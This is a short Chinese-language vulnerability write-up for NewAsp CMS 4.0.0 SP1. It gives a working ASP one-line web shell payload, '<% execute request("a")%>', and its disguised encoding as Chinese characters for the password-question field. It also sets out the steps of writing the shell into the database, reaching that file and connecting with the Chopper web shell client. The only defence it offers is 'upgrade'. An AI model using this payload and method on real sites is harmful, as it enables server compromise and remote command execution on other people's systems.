漏洞描述:在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,从而拿到shell
漏洞分析:在密码问题处填写“┼攠數畣整爠煥敵瑳∨≡┩愾”,即“<% execute request("a")%>”经过Erlang 中文简体字 GB2312 转 unicode 转换来的,然后确定就可以了
影响版本:Powered by:NewAsp CMS Version 4.0.0 SP1
防御方法:升级版本
示例:
编写一句话到数据库中
访问数据库
菜刀连接成功